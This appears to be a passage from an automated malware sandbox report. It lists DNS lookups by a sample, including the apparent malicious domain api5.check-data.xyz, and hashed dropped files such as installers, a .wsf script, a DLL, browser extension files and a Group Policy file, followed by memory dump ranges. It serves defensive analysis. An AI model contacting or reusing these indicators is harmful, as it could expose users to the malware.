                                                                                                                        c.pki.goog
                                                                                                                        dns
                                                                                                                        mqcBDmi.exe
                                                                                                                        56 B
                                                                                                                        107 B
                                                                                                                        1
                                                                                                                        1

                                                                                                                        DNS Request

                                                                                                                        c.pki.goog

                                                                                                                        DNS Response

                                                                                                                        216.58.201.99

                                                                                                                      • 8.8.8.8:53
                                                                                                                        o.pki.goog
                                                                                                                        dns
                                                                                                                        mqcBDmi.exe
                                                                                                                        56 B
                                                                                                                        107 B
                                                                                                                        1
                                                                                                                        1

                                                                                                                        DNS Request

                                                                                                                        o.pki.goog

                                                                                                                        DNS Response

                                                                                                                        216.58.201.99

                                                                                                                      • 8.8.8.8:53
                                                                                                                        clients2.google.com
                                                                                                                        dns
                                                                                                                        mqcBDmi.exe
                                                                                                                        65 B
                                                                                                                        105 B
                                                                                                                        1
                                                                                                                        1

                                                                                                                        DNS Request

                                                                                                                        clients2.google.com

                                                                                                                        DNS Response

                                                                                                                        172.217.16.238

                                                                                                                      • 8.8.8.8:53
                                                                                                                        clients2.googleusercontent.com
                                                                                                                        dns
                                                                                                                        mqcBDmi.exe
                                                                                                                        76 B
                                                                                                                        121 B
                                                                                                                        1
                                                                                                                        1

                                                                                                                        DNS Request

                                                                                                                        clients2.googleusercontent.com

                                                                                                                        DNS Response

                                                                                                                        142.250.187.225

                                                                                                                      • 8.8.8.8:53
                                                                                                                        api5.check-data.xyz
                                                                                                                        dns
                                                                                                                        rundll32.exe
                                                                                                                        65 B
                                                                                                                        159 B
                                                                                                                        1
                                                                                                                        1

                                                                                                                        DNS Request

                                                                                                                        api5.check-data.xyz

                                                                                                                        DNS Response

                                                                                                                        44.237.52.63
                                                                                                                        44.240.96.128

                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Program Files (x86)\NFFblPWVSTUU2\ZcASiPD.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        0fa3ee4d9e000ab80a8377412e40aea5

                                                                                                                        SHA1

                                                                                                                        234952aa8b42c7bee376f18719b7c3997e343a2c

                                                                                                                        SHA256

                                                                                                                        65170c66c742eea1b9dda450e10a2c61a4ca7f54ba9542251aa9f3cc917cdcc0

                                                                                                                        SHA512

                                                                                                                        1cea62f5d00370ddce0c5a80ad64d16603dc667a168d763dd0d4ab912482281ea93800cf3e94440ec4201a4e1f3dee81c60ea9653e9ca78e2ae86e0124849a2d

                                                                                                                      • C:\Program Files (x86)\OniiUkVuU\ZBTPGyo.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        5f73e487983b4078b7a4e0ce779ae659

                                                                                                                        SHA1

                                                                                                                        5a7b2dc95cffd2be91ae120d6adf18edadde41a1

                                                                                                                        SHA256

                                                                                                                        0d0eb0e1e51e93f83ec4b78c229d6e0ec96992b35357d061de1a650f6eb93ab6

                                                                                                                        SHA512

                                                                                                                        9e5c928113a13a6e49162645264b14e0b08c25da0a23779189a41c113a82a66b38ee8a1b72208917d99d1e5ea0b3fb4aa9272c2cf8ee152fe7efeeb2862deb06

                                                                                                                      • C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR\XkZlrsM.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        8bed20c1e99dceb6c33358baac76c83c

                                                                                                                        SHA1

                                                                                                                        4b0fd8d39dff2c267e4bc2f20ffa5929cf240c88

                                                                                                                        SHA256

                                                                                                                        c0e4495fcf860f7d6d996029f1ee92c97909d8734a52517985fd956c11c3745c

                                                                                                                        SHA512

                                                                                                                        206689d889b79233f15c6d9a7a695205cfb3974db2311364d2c7421d01703d080be7965e8caf42e6cca6d6110cbd23495cb73101adcae6008168c408efcb53dd

                                                                                                                      • C:\Program Files (x86)\oMPLyiqsgsRtC\xaXYsNF.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        3fe455cfcd6e5dd975d9f187fb65cd34

                                                                                                                        SHA1

                                                                                                                        656fdba3928bc531ec141dcfdaa1a44d7afa2333

                                                                                                                        SHA256

                                                                                                                        981aa67ca99c3a33857e9a8dc90fcebb484c4b11dd8376d72807b30a7d304c84

                                                                                                                        SHA512

                                                                                                                        c64950a01e922407343d69ad6438bd1797b1bb60500b781face781e1317799dba2e5b5459fc839d3362cd84a886e23b45a7605a380d9bcb6195d5e32a669faa0

                                                                                                                      • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                        Filesize

                                                                                                                        2.0MB

                                                                                                                        MD5

                                                                                                                        72fdf8c3aa0291d4a1fc62fe5094f6c3

                                                                                                                        SHA1

                                                                                                                        113a9cd974719e09496a7d5d679e50aa1e07dec1

                                                                                                                        SHA256

                                                                                                                        e4bd8e2d233fbfe9a82acac861e72a283e328304af9d1ec3b0d51587f8536018

                                                                                                                        SHA512

                                                                                                                        6d91d6e40d3f9e228bb63703a99e1c691dc813346f449a60801d034e768905deda23a1676f5b7577f51af869c7ee3c7805397dc7bba0de08cba3931c9adf74a1

                                                                                                                      • C:\ProgramData\RfQdYYQjhFJxkqVB\qWvhJeI.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        2e43d9caee317be772d5865044ebd599

                                                                                                                        SHA1

                                                                                                                        ea580b7e30297260ac8f7d2e32dd58136c9f3f50

                                                                                                                        SHA256

                                                                                                                        92c5ce1008a77e6a337c722e59840dd0b19535bddaf89989cdb108f8f408150e

                                                                                                                        SHA512

                                                                                                                        8e52863f137b0541ef54d6a94900d2cf90133a9001c6aad1da9b3ab6286fdad9dc2dc28334f05aacd143f97180de575ce528246dc12107e777064301f56aac91

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                        Filesize

                                                                                                                        187B

                                                                                                                        MD5

                                                                                                                        2a1e12a4811892d95962998e184399d8

                                                                                                                        SHA1

                                                                                                                        55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                        SHA256

                                                                                                                        32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                        SHA512

                                                                                                                        bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                        Filesize

                                                                                                                        136B

                                                                                                                        MD5

                                                                                                                        238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                        SHA1

                                                                                                                        0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                        SHA256

                                                                                                                        801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                        SHA512

                                                                                                                        2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                        Filesize

                                                                                                                        150B

                                                                                                                        MD5

                                                                                                                        0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                        SHA1

                                                                                                                        6a51537cef82143d3d768759b21598542d683904

                                                                                                                        SHA256

                                                                                                                        0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                        SHA512

                                                                                                                        5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        10KB

                                                                                                                        MD5

                                                                                                                        89435c5bc9dfda06de8f396f8a0d81b4

                                                                                                                        SHA1

                                                                                                                        1a27ae517a0780341c8da8ffe73f4faffe938af2

                                                                                                                        SHA256

                                                                                                                        b3a8874bcb56ceb3716acf384b51909584f818f0c00b38e0ad577e430100a850

                                                                                                                        SHA512

                                                                                                                        d030c0f4e40255ed5be71823890ddc0571ef889bd45da80b8b2ec2a5fe1977c3d5101e5cc0a292b464edbf5a9ce5dc2abc7297df4e7a93d1792f5c5265349b9b

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                        Filesize

                                                                                                                        28KB

                                                                                                                        MD5

                                                                                                                        be2e808ba83ddd46589230269c09349e

                                                                                                                        SHA1

                                                                                                                        bc0910ddc43b156b4500b98482e42fe33c2be115

                                                                                                                        SHA256

                                                                                                                        ea81cc656e59a1c93bc2689b3904098b8b84aa908993acadcb74dd8ecb657ff4

                                                                                                                        SHA512

                                                                                                                        3c8759d477e63dd186f137c9d5e53993843bdff3dad77dfc7bea6d9c71276dc3b28c2b1758d8119499cc8de9bdc429c008baf695433a3382ff3e029fa39a03da

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        068ec4d21f758f843bbacaaae9fd4dbd

                                                                                                                        SHA1

                                                                                                                        2e5403c2be065482c564316fba44e72694adb3ad

                                                                                                                        SHA256

                                                                                                                        4de992193cdd56f6d5ad2b40f11e616d92a2f559e916709ce5519e9ae4a97fa2

                                                                                                                        SHA512

                                                                                                                        7d9b06112286e8f7cc31b8620e266156869a00e1b8ac8d63278af2f17696328982c1aaa52795ad5cbdfb870e5c1e73038a09c61b3f926cd3e658f3d7943bf795

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LGQY2JCD3RR2IV34YIY9.temp

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        484b85bac5416ab7c6176e5007578d58

                                                                                                                        SHA1

                                                                                                                        1c9b18855954d435528b553e9ec36628b23b4c72

                                                                                                                        SHA256

                                                                                                                        809524c9732c57fa5ce87dd80eeef6bbdc5429fcbe79dc48138994a5d7a308da

                                                                                                                        SHA512

                                                                                                                        e16def92b77df8aba6cbb382097ae111dfbbc4e63fcbf01cab6c63c3fdbee838460bbb771d7a0ac81b4b26f0aecdb32c5c90ffba8db1203dd90c5b793fea461b

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nndpnsl0.default-release\prefs.js

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        e824537284aef6f669e36d56a9b9b762

                                                                                                                        SHA1

                                                                                                                        53ec878c15388fdb4e01f754d5f53e968851fc0c

                                                                                                                        SHA256

                                                                                                                        53d6ee650158647c186941019fdc0593d91568fb2a7fa9e3a4d8c21c73c07527

                                                                                                                        SHA512

                                                                                                                        de0d57725890728b6e078c1bb05c4e7fd1836e501ec8e188913066a91f6ee9c36d4dc9e33c0e9b2373c0ce12751a6e2ed29855015ff23a7ff77ec01afdbf6b12

                                                                                                                      • C:\Windows\Temp\RkUDfeHyKRZhrXlO\KtpthcnL\HIzopuZuwQofSIBu.wsf

                                                                                                                        Filesize

                                                                                                                        9KB

                                                                                                                        MD5

                                                                                                                        838a6d63c3a927d217af6e2237ff9d0a

                                                                                                                        SHA1

                                                                                                                        40f6ab07322fc4c6d03e5783b20fbe0f9334c79a

                                                                                                                        SHA256

                                                                                                                        18db848096e080dcb7d0af3334e2bacc2f80347c0b35df6812856020d03e9b21

                                                                                                                        SHA512

                                                                                                                        0dd1e102d64e58879228e9d6a27980ef8aa9fe8b51b13d045a4f14a098b6e8629f2123ee64869bc3f0d813d297682ed78f87adc8fdb4ecab1153558d8a13a2f6

                                                                                                                      • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                        Filesize

                                                                                                                        5KB

                                                                                                                        MD5

                                                                                                                        fe6a7fa86ce140d679b064af06b23da0

                                                                                                                        SHA1

                                                                                                                        dec23a9ac5c7016f0f7138b0f01a9303f9656ae3

                                                                                                                        SHA256

                                                                                                                        4e91f35ba55feae7fc1a838dec9db840c96b73e0875bcfb8513e111bf88e43df

                                                                                                                        SHA512

                                                                                                                        6767722bfcb6bb8dbe9b80d9c298770bdf904b6354e567d161e5c2b29df7f14f9c623e5ea5f8cfbd3ebd0c79d085fcb50a60bac3974ee2c35943de6d5dd858fd

                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS41D1.tmp\Install.exe

                                                                                                                        Filesize

                                                                                                                        6.4MB

                                                                                                                        MD5

                                                                                                                        b6c0ddbcd0713b164497514c4d908831

                                                                                                                        SHA1

                                                                                                                        88638a95176133465505bea6f780e952e20e0217

                                                                                                                        SHA256

                                                                                                                        3690ea841d737d1505221476dcba9574e0361459d59eb1103d74b99b56ff2d76

                                                                                                                        SHA512

                                                                                                                        c85b8ea406f2d5bd6f73903cdcf66d6bd7e84e7a374b8e3051a4bb479890ef34a0735883b6b84df5f9181632ef198a096812d9c08752320c75acc13024007004

                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS4441.tmp\Install.exe

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                        MD5

                                                                                                                        115546cac410b9675cb9347e7cf7d64a

                                                                                                                        SHA1

                                                                                                                        1302b93e02fae2423d22c47e82cab233c07c5f7b

                                                                                                                        SHA256

                                                                                                                        0dbe6c46489c63ff8c3638be1ea4657a226978643fd3411df5b56196a052e67c

                                                                                                                        SHA512

                                                                                                                        5d6db68fe38e7797fea57ee06397365c063179fed0855b4728a18bfa2f8785fd2190a9b3e14e39e2d66ba04410066b313a3169cebfa11c3e0c70e902b9f89a9f

                                                                                                                      • \Windows\Temp\RkUDfeHyKRZhrXlO\WfvRaOTI\cIkMdBo.dll

                                                                                                                        Filesize

                                                                                                                        6.4MB

                                                                                                                        MD5

                                                                                                                        e1e4349f77244f2529eca36471a1b3c4

                                                                                                                        SHA1

                                                                                                                        e71982e57783d0cdc2464b0033f1636076b8ebb3

                                                                                                                        SHA256

                                                                                                                        45fe506d58bd345b130409725086d7ecbcd237731b793ff5fc8ee087c7b3ed56

                                                                                                                        SHA512

                                                                                                                        b2f087bab7963b17a0676432bc54494ed5e30950d63bd5d61f128557235991b5bb74b05e851a4f1fdf97b3af9b0559d817f77046c0a57b896ab7f5fd833f1f7c

                                                                                                                      • memory/580-52-0x00000000022A0000-0x00000000022A8000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/580-51-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        2.9MB

                                                                                                                      • memory/1104-355-0x0000000001520000-0x000000000606A000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        75.3MB

                                                                                                                      • memory/1700-61-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        2.9MB

                                                                                                                      • memory/1700-62-0x0000000001F00000-0x0000000001F08000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/2352-35-0x0000000002270000-0x0000000002926000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2352-22-0x0000000002270000-0x0000000002926000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2712-37-0x0000000001580000-0x0000000001C36000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2712-36-0x0000000000EC0000-0x0000000001576000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2712-28-0x0000000010000000-0x0000000014B4A000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        75.3MB

                                                                                                                      • memory/2712-23-0x0000000000EC0000-0x0000000001576000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2712-26-0x0000000001580000-0x0000000001C36000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2712-25-0x0000000001580000-0x0000000001C36000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2712-24-0x0000000001580000-0x0000000001C36000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2840-40-0x0000000001180000-0x0000000001836000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2840-83-0x0000000001180000-0x0000000001836000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2840-63-0x0000000001180000-0x0000000001836000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2840-41-0x0000000010000000-0x0000000014B4A000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        75.3MB

                                                                                                                      • memory/3060-130-0x0000000001B30000-0x0000000001B97000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        412KB

                                                                                                                      • memory/3060-96-0x0000000001850000-0x00000000018D5000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        532KB

                                                                                                                      • memory/3060-86-0x0000000010000000-0x0000000014B4A000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        75.3MB

                                                                                                                      • memory/3060-327-0x00000000038B0000-0x0000000003981000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        836KB

                                                                                                                      • memory/3060-82-0x0000000000360000-0x0000000000A16000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/3060-358-0x0000000000360000-0x0000000000A16000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/3060-313-0x00000000025A0000-0x000000000262A000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        552KB

                                                                                                                      We care about your privacy.

                                                                                                                      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.